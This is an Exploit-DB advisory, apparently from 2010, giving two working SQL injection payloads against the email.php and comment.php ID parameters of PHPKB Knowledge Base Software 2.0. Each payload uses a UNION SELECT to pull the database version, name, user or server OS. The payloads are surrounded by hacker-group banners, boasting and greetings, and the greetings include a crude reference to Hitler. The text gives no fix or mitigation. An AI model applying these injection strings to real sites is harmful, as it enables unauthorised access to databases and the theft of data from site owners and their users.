PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections

EDB-ID:

12561


Platform:

PHP

Published:

2010-05-10

[+] {In The Name Of Allah The Mercifull}
[+]
[~] Tybe: PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities
[~] Vendor: www.knowledgebase-script.com
[+] Software:PHPKB Knowledge Base Software v2 Multilanguage Support
[-]
[+] author: ((R3d-D3v!L))
[~]

[+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5))
[~]

[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 04:15 am GMT
[?] Home: © Offensive Security
[?]
[?]
[-]{DEV!L'5 of SYST3M}

======================================================================================
# SQL Injection #1 - email.php ID
======================================================================================
[*] Err0r C0N50L3:
http://127.0.0.1/email.php?ID={EV!L EXPLO!T}

[*]{EV!L EXPLO!T}
1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*

======================================================================================
# SQL Injection #2 - comment.php ID
======================================================================================
[*] Err0r C0N50L3:
http://127.0.0.1/comment.php?ID=EV!L EXPLO!T

[*]{EV!L EXPLO!T}
-1+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*



N073:

REAL RED DEV!L W@S h3r3 LAMERZ

GAZA !N our hearts !


[~]-----------------------------{((MAGOUSH-87))}------------------------------------------------#
#
[~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] #
#
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #
#
[~] spechial thanks : ((HITLER JEDDAH & S!R TOTT! & DR.DAShER)) #
#
[?]spechial SupP0RT : MY M!ND # © Offensive Security #
#
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) #
#
[~]spechial FR!ND: 0r45hy #
#
[~] !'M 4R48!4N 3XPL0!73R. #
#
[~]{[(D!R 4ll 0R D!E)]}; #
#
[~]--------------------------------------------------------------------------------------------- #